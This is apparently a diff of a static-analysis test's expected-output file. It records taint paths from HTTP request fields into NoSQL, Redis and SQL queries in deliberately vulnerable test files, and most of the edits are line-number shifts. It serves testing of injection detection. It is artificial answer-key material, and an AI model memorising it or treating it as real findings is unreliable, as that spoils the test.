mongodb.js:13:19:13:32 | req.body.title | mongodb.js:17:16:17:20 | query | provenance | Config | +| mongodb.js:25:11:25:32 | title | mongodb.js:30:38:30:42 | title | provenance | | +| mongodb.js:25:19:25:26 | req.body | mongodb.js:25:19:25:32 | req.body.title | provenance | Config | +| mongodb.js:25:19:25:32 | req.body.title | mongodb.js:25:11:25:32 | title | provenance | | +| mongodb.js:30:27:30:43 | JSON.parse(title) | mongodb.js:30:18:30:45 | { title ... itle) } | provenance | Config | +| mongodb.js:30:38:30:42 | title | mongodb.js:30:27:30:43 | JSON.parse(title) | provenance | Config | +| mongodb.js:46:11:46:20 | query | mongodb.js:47:5:47:9 | query | provenance | | +| mongodb.js:46:19:46:20 | {} | mongodb.js:46:11:46:20 | query | provenance | | +| mongodb.js:47:5:47:9 | query | mongodb.js:51:16:51:20 | query | provenance | | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:46:11:46:20 | query | provenance | Config | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:46:19:46:20 | {} | provenance | Config | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:47:5:47:9 | query | provenance | Config | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:51:16:51:20 | query | provenance | Config | +| mongodb.js:56:8:56:17 | query | mongodb.js:57:2:57:6 | query | provenance | | +| mongodb.js:56:16:56:17 | {} | mongodb.js:56:8:56:17 | query | provenance | | +| mongodb.js:57:2:57:6 | query | mongodb.js:61:12:61:16 | query | provenance | | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:56:8:56:17 | query | provenance | Config | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:56:16:56:17 | {} | provenance | Config | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:57:2:57:6 | query | provenance | Config | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:61:12:61:16 | query | provenance | Config | +| mongodb.js:66:7:66:25 | tag | mongodb.js:72:22:72:24 | tag | provenance | | +| mongodb.js:66:7:66:25 | tag | mongodb.js:79:20:79:22 | tag | provenance | | +| mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:66:7:66:25 | tag | provenance | | +| mongodb.js:72:22:72:24 | tag | mongodb.js:72:14:72:26 | { tags: tag } | provenance | Config | +| mongodb.js:79:20:79:22 | tag | mongodb.js:79:12:79:24 | { tags: tag } | provenance | Config | +| mongodb.js:100:9:100:18 | query | mongodb.js:101:3:101:7 | query | provenance | | +| mongodb.js:100:17:100:18 | {} | mongodb.js:100:9:100:18 | query | provenance | | +| mongodb.js:101:3:101:7 | query | mongodb.js:105:14:105:18 | query | provenance | | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:100:9:100:18 | query | provenance | Config | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:100:17:100:18 | {} | provenance | Config | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:101:3:101:7 | query | provenance | Config | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:105:14:105:18 | query | provenance | Config | | mongodb_bodySafe.js:23:11:23:20 | query | mongodb_bodySafe.js:24:5:24:9 | query | provenance | | | mongodb_bodySafe.js:23:19:23:20 | {} | mongodb_bodySafe.js:23:11:23:20 | query | provenance | | -| mongodb_bodySafe.js:24:5:24:9 | query | mongodb_bodySafe.js:29:16:29:20 | query | provenance | | +| mongodb_bodySafe.js:24:5:24:9 | query | mongodb_bodySafe.js:28:16:28:20 | query | provenance | | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:11:23:20 | query | provenance | Config | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:19:23:20 | {} | provenance | Config | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:24:5:24:9 | query | provenance | Config | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | provenance | Config | +| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:28:16:28:20 | query | provenance | Config | | mongoose.js:20:8:20:17 | query | mongoose.js:21:2:21:6 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:24:22:24:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:27:17:27:21 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:30:22:30:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:33:21:33:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:36:28:36:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:39:16:39:20 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:42:19:42:23 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:45:28:45:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:48:28:48:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:51:28:51:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:54:22:54:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:57:18:57:22 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:60:22:60:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:63:21:63:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:65:32:65:36 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:67:27:67:31 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:68:8:68:12 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:71:17:71:21 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:72:10:72:14 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:73:8:73:12 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:74:7:74:11 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:75:16:75:20 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:76:12:76:16 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:77:10:77:14 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:81:37:81:41 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:82:46:82:50 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:83:47:83:51 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:104:21:104:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:111:14:111:18 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:113:31:113:35 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:133:38:133:42 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:136:30:136:34 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:23:22:23:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:25:17:25:21 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:27:22:27:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:29:21:29:25 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:31:28:31:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:33:16:33:20 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:35:19:35:23 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:37:28:37:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:39:28:39:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:41:28:41:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:43:22:43:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:45:18:45:22 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:47:22:47:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:49:21:49:25 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:51:32:51:36 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:53:27:53:31 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:54:8:54:12 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:57:17:57:21 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:58:10:58:14 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:59:8:59:12 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:60:7:60:11 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:61:16:61:20 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:62:12:62:16 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:63:10:63:14 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:67:37:67:41 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:68:46:68:50 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:69:47:69:51 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:90:21:90:25 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:97:14:97:18 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:99:31:99:35 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:119:38:119:42 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:122:30:122:34 | query | provenance | | | mongoose.js:20:16:20:17 | {} | mongoose.js:20:8:20:17 | query | provenance | | -| mongoose.js:21:2:21:6 | query | mongoose.js:24:22:24:26 | query | provenance | | +| mongoose.js:21:2:21:6 | query | mongoose.js:23:22:23:26 | query | provenance | | | mongoose.js:21:16:21:23 | req.body | mongoose.js:21:16:21:29 | req.body.title | provenance | Config | | mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:8:20:17 | query | provenance | Config | | mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:16:20:17 | {} | provenance | Config | | mongoose.js:21:16:21:29 | req.body.title | mongoose.js:21:2:21:6 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:24:22:24:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:27:17:27:21 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:30:22:30:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:33:21:33:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:36:28:36:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:39:16:39:20 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:42:19:42:23 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:45:28:45:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:48:28:48:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:51:28:51:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:54:22:54:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:57:18:57:22 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:60:22:60:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:63:21:63:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:65:32:65:36 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:67:27:67:31 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:68:8:68:12 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:71:17:71:21 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:72:10:72:14 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:73:8:73:12 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:74:7:74:11 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:75:16:75:20 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:76:12:76:16 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:77:10:77:14 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:81:37:81:41 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:23:22:23:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:25:17:25:21 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:27:22:27:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:29:21:29:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:31:28:31:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:33:16:33:20 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:35:19:35:23 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:37:28:37:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:39:28:39:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:41:28:41:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:43:22:43:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:45:18:45:22 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:47:22:47:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:49:21:49:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:51:32:51:36 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:53:27:53:31 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:54:8:54:12 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:57:17:57:21 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:58:10:58:14 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:59:8:59:12 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:60:7:60:11 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:61:16:61:20 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:62:12:62:16 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:63:10:63:14 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:67:37:67:41 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:68:46:68:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:69:47:69:51 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:71:46:71:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:73:51:73:55 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:75:46:75:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:78:46:78:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:80:51:80:55 | query | provenance | Config | | mongoose.js:21:16:21:29 | req.body.title | mongoose.js:82:46:82:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:83:47:83:51 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:85:46:85:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:87:51:87:55 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:89:46:89:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:92:46:92:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:94:51:94:55 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:96:46:96:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:104:21:104:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:111:14:111:18 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:113:31:113:35 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:133:38:133:42 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:136:30:136:34 | query | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:24:21:24:27 | [query] | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:27:17:27:21 | query | provenance | | -| mongoose.js:27:17:27:21 | query | mongoose.js:30:22:30:26 | query | provenance | | -| mongoose.js:30:22:30:26 | query | mongoose.js:33:21:33:25 | query | provenance | | -| mongoose.js:33:21:33:25 | query | mongoose.js:36:28:36:32 | query | provenance | | -| mongoose.js:36:28:36:32 | query | mongoose.js:39:16:39:20 | query | provenance | | -| mongoose.js:39:16:39:20 | query | mongoose.js:42:19:42:23 | query | provenance | | -| mongoose.js:42:19:42:23 | query | mongoose.js:45:28:45:32 | query | provenance | | -| mongoose.js:45:28:45:32 | query | mongoose.js:48:28:48:32 | query | provenance | | -| mongoose.js:48:28:48:32 | query | mongoose.js:51:28:51:32 | query | provenance | | -| mongoose.js:51:28:51:32 | query | mongoose.js:54:22:54:26 | query | provenance | | -| mongoose.js:54:22:54:26 | query | mongoose.js:57:18:57:22 | query | provenance | | -| mongoose.js:57:18:57:22 | query | mongoose.js:60:22:60:26 | query | provenance | | -| mongoose.js:60:22:60:26 | query | mongoose.js:63:21:63:25 | query | provenance | | -| mongoose.js:63:21:63:25 | query | mongoose.js:65:32:65:36 | query | provenance | | -| mongoose.js:65:32:65:36 | query | mongoose.js:67:27:67:31 | query | provenance | | -| mongoose.js:67:27:67:31 | query | mongoose.js:68:8:68:12 | query | provenance | | -| mongoose.js:68:8:68:12 | query | mongoose.js:71:17:71:21 | query | provenance | | -| mongoose.js:71:17:71:21 | query | mongoose.js:72:10:72:14 | query | provenance | | -| mongoose.js:72:10:72:14 | query | mongoose.js:73:8:73:12 | query | provenance | | -| mongoose.js:73:8:73:12 | query | mongoose.js:74:7:74:11 | query | provenance | | -| mongoose.js:74:7:74:11 | query | mongoose.js:75:16:75:20 | query | provenance | | -| mongoose.js:75:16:75:20 | query | mongoose.js:76:12:76:16 | query | provenance | | -| mongoose.js:76:12:76:16 | query | mongoose.js:77:10:77:14 | query | provenance | | -| mongoose.js:77:10:77:14 | query | mongoose.js:81:37:81:41 | query | provenance | | -| mongoose.js:81:37:81:41 | query | mongoose.js:82:46:82:50 | query | provenance | | -| mongoose.js:82:46:82:50 | query | mongoose.js:83:47:83:51 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:85:46:85:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:87:51:87:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:89:46:89:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:92:46:92:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:94:51:94:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:96:46:96:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:104:21:104:25 | query | provenance | | -| mongoose.js:104:21:104:25 | query | mongoose.js:111:14:111:18 | query | provenance | | -| mongoose.js:111:14:111:18 | query | mongoose.js:113:31:113:35 | query | provenance | | -| mongoose.js:113:31:113:35 | query | mongoose.js:133:38:133:42 | query | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:123:20:123:21 | id | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:130:23:130:24 | id | provenance | | -| mongoose.js:115:11:115:22 | req.query.id | mongoose.js:115:6:115:22 | id | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:116:22:116:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:117:21:117:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:118:21:118:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:119:18:119:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:120:22:120:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:121:16:121:19 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:122:19:122:22 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:124:28:124:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:125:28:125:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:126:28:126:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:127:18:127:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:128:22:128:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:129:21:129:24 | cond | provenance | | -| mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:115:25:115:45 | cond | provenance | | -| mongoose.js:130:23:130:24 | id | mongoose.js:130:16:130:26 | { _id: id } | provenance | Config | -| mongoose.js:133:38:133:42 | query | mongoose.js:136:30:136:34 | query | provenance | | -| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:23:19:23:23 | query | provenance | | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:90:21:90:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:97:14:97:18 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:99:31:99:35 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:119:38:119:42 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:122:30:122:34 | query | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:23:21:23:27 | [query] | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:25:17:25:21 | query | provenance | | +| mongoose.js:25:17:25:21 | query | mongoose.js:27:22:27:26 | query | provenance | | +| mongoose.js:27:22:27:26 | query | mongoose.js:29:21:29:25 | query | provenance | | +| mongoose.js:29:21:29:25 | query | mongoose.js:31:28:31:32 | query | provenance | | +| mongoose.js:31:28:31:32 | query | mongoose.js:33:16:33:20 | query | provenance | | +| mongoose.js:33:16:33:20 | query | mongoose.js:35:19:35:23 | query | provenance | | +| mongoose.js:35:19:35:23 | query | mongoose.js:37:28:37:32 | query | provenance | | +| mongoose.js:37:28:37:32 | query | mongoose.js:39:28:39:32 | query | provenance | | +| mongoose.js:39:28:39:32 | query | mongoose.js:41:28:41:32 | query | provenance | | +| mongoose.js:41:28:41:32 | query | mongoose.js:43:22:43:26 | query | provenance | | +| mongoose.js:43:22:43:26 | query | mongoose.js:45:18:45:22 | query | provenance | | +| mongoose.js:45:18:45:22 | query | mongoose.js:47:22:47:26 | query | provenance | | +| mongoose.js:47:22:47:26 | query | mongoose.js:49:21:49:25 | query | provenance | | +| mongoose.js:49:21:49:25 | query | mongoose.js:51:32:51:36 | query | provenance | | +| mongoose.js:51:32:51:36 | query | mongoose.js:53:27:53:31 | query | provenance | | +| mongoose.js:53:27:53:31 | query | mongoose.js:54:8:54:12 | query | provenance | | +| mongoose.js:54:8:54:12 | query | mongoose.js:57:17:57:21 | query | provenance | | +| mongoose.js:57:17:57:21 | query | mongoose.js:58:10:58:14 | query | provenance | | +| mongoose.js:58:10:58:14 | query | mongoose.js:59:8:59:12 | query | provenance | | +| mongoose.js:59:8:59:12 | query | mongoose.js:60:7:60:11 | query | provenance | | +| mongoose.js:60:7:60:11 | query | mongoose.js:61:16:61:20 | query | provenance | | +| mongoose.js:61:16:61:20 | query | mongoose.js:62:12:62:16 | query | provenance | | +| mongoose.js:62:12:62:16 | query | mongoose.js:63:10:63:14 | query | provenance | | +| mongoose.js:63:10:63:14 | query | mongoose.js:67:37:67:41 | query | provenance | | +| mongoose.js:67:37:67:41 | query | mongoose.js:68:46:68:50 | query | provenance | | +| mongoose.js:68:46:68:50 | query | mongoose.js:69:47:69:51 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:71:46:71:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:73:51:73:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:75:46:75:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:78:46:78:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:80:51:80:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:82:46:82:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:90:21:90:25 | query | provenance | | +| mongoose.js:90:21:90:25 | query | mongoose.js:97:14:97:18 | query | provenance | | +| mongoose.js:97:14:97:18 | query | mongoose.js:99:31:99:35 | query | provenance | | +| mongoose.js:99:31:99:35 | query | mongoose.js:119:38:119:42 | query | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:109:20:109:21 | id | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:116:23:116:24 | id | provenance | | +| mongoose.js:101:11:101:22 | req.query.id | mongoose.js:101:6:101:22 | id | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:102:22:102:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:103:21:103:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:104:21:104:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:105:18:105:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:106:22:106:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:107:16:107:19 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:108:19:108:22 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:110:28:110:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:111:28:111:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:112:28:112:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:113:18:113:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:114:22:114:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:115:21:115:24 | cond | provenance | | +| mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:101:25:101:45 | cond | provenance | | +| mongoose.js:116:23:116:24 | id | mongoose.js:116:16:116:26 | { _id: id } | provenance | Config | +| mongoose.js:119:38:119:42 | query | mongoose.js:122:30:122:34 | query | provenance | | +| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:22:19:22:23 | query | provenance | | | mongooseJsonParse.js:19:19:19:20 | {} | mongooseJsonParse.js:19:11:19:20 | query | provenance | | | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | provenance | Config | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:11:19:20 | query | provenance | Config | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:19:19:20 | {} | provenance | Config | -| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:23:19:23:23 | query | provenance | Config | +| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:22:19:22:23 | query | provenance | Config | | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | provenance | Config | | mongooseModelClient.js:10:7:10:32 | v | mongooseModelClient.js:11:22:11:22 | v | provenance | | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | mongooseModelClient.js:10:7:10:32 | v | provenance | | @@ -621,24 +621,24 @@ edges | redis.js:38:17:38:28 | req.body.key | redis.js:38:11:38:28 | key | provenance | | | socketio.js:10:25:10:30 | handle | socketio.js:11:46:11:51 | handle | provenance | | | socketio.js:11:46:11:51 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | provenance | | -| tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | provenance | | +| tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | provenance | | | tst3.js:7:7:8:55 | query1 | tst3.js:9:14:9:19 | query1 | provenance | | | tst3.js:8:16:8:34 | req.params.category | tst3.js:7:7:8:55 | query1 | provenance | | | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | provenance | | | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | provenance | | subpaths #select -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | 